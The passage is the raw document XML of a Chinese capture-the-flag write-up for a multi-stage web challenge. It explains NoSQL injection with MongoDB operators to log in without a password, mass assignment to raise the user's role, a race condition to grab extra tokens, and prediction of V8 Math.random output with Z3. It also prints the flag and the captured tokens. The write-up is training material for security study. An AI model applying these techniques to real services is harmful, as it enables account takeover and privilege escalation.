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-n0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶场环境配置与前置信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题目环境及测试机器地址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://39.105.213.28:14509/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进入系统首页后，能够收集到如下指引线索：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界面暗示我们“代码可以读读”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站点分别设立了四个八卦子路径：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/qian</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dui</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/li</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/zhen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审查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/robots.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会暴露出这四条通道的具体指向，并且发现另一个敏感目录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/half-immortal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通关所获取到的原始</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{bagua_MYQH1826B5gEJLo}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="header-n15"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">整体攻击链路剖析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本关卡本质上是一条由多个漏洞节点串联而成的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">综合攻击链。其核心攻防步骤包含：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首先针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/qian/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端点，利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NoSQL (MongoDB) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语法糖实施注入漏洞，从而在无需校验真实密码的情况下顶替</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qingyun</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">账号登录。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借用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dui/update</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处的参数批量赋值缺陷（Mass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Assignment），实现对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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等越权字段的强制覆盖修改。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发现并在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/li/grab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中触发条件竞争（Race</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Condition）漏洞。借助高并发网络请求，打破服务端“每人一证”的领取约束，一次性窃取多张司命令牌。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探查并利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/zhen/history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">泄露出来的值；服务端在底层实际上是通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Math.floor(Math.random() * 1000000)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一行来随机产生抽签号码的。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依托收集到的多条输出历史，还原出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> V8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引擎下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xorshift128+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成器内部状态，进而顺水推舟算出本期将要下发的签号。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最后突破身份验证的终极屏障，将自身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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">账户权限调至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“掌门”层次，提交精准算出的预测值和三块令牌，从而摘下该题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n30"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第一重挑战：攻陷“乾卦”（NoSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注射提权）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抵达</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/qian</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路由时，前端给出了一段极具误导性却又十分直白的暗示语：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{"$ne": null}、{"$regex": "^a"} 这类“运算符”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">负责验证登录态的后端接口抓包如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /qian/login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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统逻辑强制以“见习道童”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qingyun</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为基础用户名。在此情况下，密码比对流程可以依靠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MongoDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的条件表达式符来强行躲开：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"qingyun"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"$nin"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"x"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校验通过后的服务器会签发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并返回对应身份：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"欢迎，见习道童"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"qingyun_xxxxxxxxxxxxxxxx"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"apprentice"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"见习道童"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"下一步：兑卦 /dui 自修门规"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一个小技巧在此体现：系统每承认一次有效的登录事件，都会隔离化分配一个后缀不同的独立</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qingyun_xxx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话角色，这一设计刚好方便了我们在后面调试中规避相互状态覆盖的问题。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="header-n40"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第二重挑战：迈向“兑卦”（参数污染实现身份跃迁）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根据指引深入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dui</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面，有一段诙谐的警告文本：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表单只让少侠改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> title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bio……</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">但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可不止这俩字段哦？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">好像没有做白名单……</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">负责资料同步更新的数据接口如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /dui/update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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由于缺少强校验的白名单过滤机制，玩家能在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">载荷中顺手添加鉴权属性字段，例如直接把自己修改为不可一世的长老席位：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"zhen"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待用户态拥有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role=elder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这个变量值，便获得了踏入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/li/grab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开启“头香争夺战”的特权。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="header-n48"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第三重挑战：瓦解“离卦”（并发竞速席卷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">支令牌）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查阅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/li</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层面的前端反馈，已经能够看出此环节对应的常见安全模型：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">先读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判断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延迟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再写</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同时发出多个请求试试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">索取凭证令牌的话，需要调用以下方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /li/grab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虽然系统给玩家的口径是每号只下发一枚。由于代码层未引入锁机制或原子写策略过滤，在判断“是否已获取”与“发放牌组”这段空窗期中，如果有大量数据包同时打入底层，便可骗过条件判定触发发牌，促使程序发放超出阈值数量的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并发操作成功后的一则回显范例为：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"头香已抢！司命令牌已发放"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"85f707c80fd82000b6173609"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"收集 3 张令牌，去震卦 /zhen 占卜天机"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笔者在测试期间利用批量化脚本抓取到的其中三个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">展示如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">85f707c80fd82000b6173609</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a3e8912050a43ab128550113</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">6cf3d1f519bc5790be6bffba</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="header-n58"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第四重挑战：推演“震卦”（破解伪造数序列模型）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抵进</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/zhen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之后，页面源码无遮掩地呈现出了抽签号生成的规律函数：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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不仅如此，结合明文页面提示与暗门途径</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/zhen/history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，访问者始终能读出服务器过往</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个轮次的开奖详情：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"remaining_ms"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316374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121642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850929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在标准的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Node </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">架构底层中，这里的随机事件遵循</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">xorshift128+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的规则演进。尽管由于执行了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">floor(random * 1000000)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的操作从而丢失了完整的精度系数，但凭借这凑齐的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">项样本区间，我们完全可以结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Z3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">定理求解器实现内存状态空间的测绘与推导。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按照实践经验看，本考题输出流序列规律遵循下述特征：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">oldest -&gt; newest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PRNG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正向输出</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">next =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newest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态再推进一次</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此现象正好映射贴合了经典的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nocache/v8-52/s0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">破绽模型。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:id="15" w:name="header-n67"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第五重挑战：冲破终关禁制（化阶为掌门之道）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">假如有玩家单纯集齐了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">张符文通证，并配对了未来中签号码直接推送至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/zhen/predict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口。倘若他当前的账户权限仍停留在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">elder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（长老级），则只会收到一段拦截提示音：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"预测正确，然门禁未启——掌门方可入"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这就证明我们的随机序列前瞻和通证完整度皆受认可，拦截阻力仅仅是当前的鉴权等级不足。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
